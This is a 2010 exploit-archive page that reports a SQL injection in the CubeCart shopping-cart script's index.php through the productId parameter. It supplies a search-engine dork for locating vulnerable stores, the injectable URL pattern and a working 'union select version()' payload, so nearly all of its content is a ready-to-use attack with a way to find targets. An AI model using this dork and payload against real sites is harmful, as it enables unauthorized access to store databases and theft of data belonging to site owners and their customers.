[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : CubeCart (index.php) SQL Injection Vulnerability
# Published : 2010-02-18
# Author : AtT4CKxT3rR0r1ST
# Previous Title : Joomla Component com_otzivi Local File Inclusion Vulnerability
# Next Title : Open Source Classifieds v1.1.0 Alpha (OSClassi) Multiple Vulnerabilities


CubeCart (index.php) Sql Injection Vulnerability
==============================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Team           : Sec Attack Team
.:. Home           : www.sec-attack.com/vb
.:. Script         : http://www.cubecart.com/downloads/
.:. Dork           : "powered by CubeCart" inurl:"index.php?_a="

####################################################################

===[ Exploit ]===

www.site.com/index.php?_a=viewProd&productId=22[Sql  Sql Injection]

===[ Example ]===

http://server/store/index.php?_a=viewProd&productId=22+and+1=2+union+select+version()

####################################################################